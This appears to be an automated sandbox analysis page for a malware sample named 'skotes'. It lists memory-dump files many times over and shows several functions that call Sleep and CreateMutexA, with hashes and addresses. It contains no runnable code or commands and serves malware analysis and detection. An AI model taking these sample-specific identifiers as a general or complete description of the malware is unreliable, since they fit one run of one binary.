Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: abeccd2cb9b94822e9ff9ec4ade14e30f02cd776f2c7866df4fd54aec150fcbe
Instruction ID: 0698cffdf7e856f2e88b83f48ee38580103fd6dba439186e7fbdac63dfb90a62
Opcode Fuzzy Hash: abeccd2cb9b94822e9ff9ec4ade14e30f02cd776f2c7866df4fd54aec150fcbe
Instruction Fuzzy Hash: B5312831B84144ABFB18ABB8DC8DBADB772EB95314F24821AE014D73D1E73D59808712

Function 0078A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 497d3be93df1a1d3e2809257700c26b085c7a8acee7721574cf623f30bb587ac
Instruction ID: df9b111e4e9e3a5847e3ceb543fa4e17734cfb40342957d9e7faf074e220ec4e
Opcode Fuzzy Hash: 497d3be93df1a1d3e2809257700c26b085c7a8acee7721574cf623f30bb587ac
Instruction Fuzzy Hash: 20312A31B44144EBFB18BBB8EC8DBADB772ABD6310F24461AE054972D1D73D59808712

Function 0078A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 694c55a41ecb04c3802a60c58a748593b0dff37e8844ec1921aab6e68e28b0ae
Instruction ID: c7a086517007d28fb2a44d9bbac2534586fc125fe9bd424a53bf413559c2334a
Opcode Fuzzy Hash: 694c55a41ecb04c3802a60c58a748593b0dff37e8844ec1921aab6e68e28b0ae
Instruction Fuzzy Hash: 96312731B44140EBFF18BBBCDC8DBADB662EB95314F20421AE0589B2D6D77D59808762

Function 0078A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 8885d981b898c9c49647260ff4e1bfc649e33894c5e40d1005f0c9f9e63b319a
Instruction ID: b74463b2fd256fe6f03bd9a6dad8a604126dbe67b9acc452d4b40f113a428441
Opcode Fuzzy Hash: 8885d981b898c9c49647260ff4e1bfc649e33894c5e40d1005f0c9f9e63b319a
Instruction Fuzzy Hash: 3C312A31745104EBFB18FBB8DC8DBADB761EB85314F24861AE054DB2D6DB3D99808722

Function 0078A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 8d5c58490871cad0fe1295140270f2d6f65798bf0f4ee32d567a2df78f94868b
Instruction ID: 5ac43b6bf6750e53af7cfa393978d46bb976c76a4a491dfea0434ca28d3aa2cf
Opcode Fuzzy Hash: 8d5c58490871cad0fe1295140270f2d6f65798bf0f4ee32d567a2df78f94868b
Instruction Fuzzy Hash: A0312831744144EBFB18BB78DC8DBADB772EB85310F24861AE014D72D6D73D99808762

Function 00789ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 844b052457b414728619284af067b3481d7aa41bfcbdd99eef1acfe69ae4de67
Instruction ID: 03d024845a8e9d66749fecda1b10b4eaf77d8b1af2facb3e96428892eaea252e
Opcode Fuzzy Hash: 844b052457b414728619284af067b3481d7aa41bfcbdd99eef1acfe69ae4de67
Instruction Fuzzy Hash: C3216731748640EBFB18BB68ECCD76CB762EBD1310F24421AE148C72D1DB7D69808712

Function 0078A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

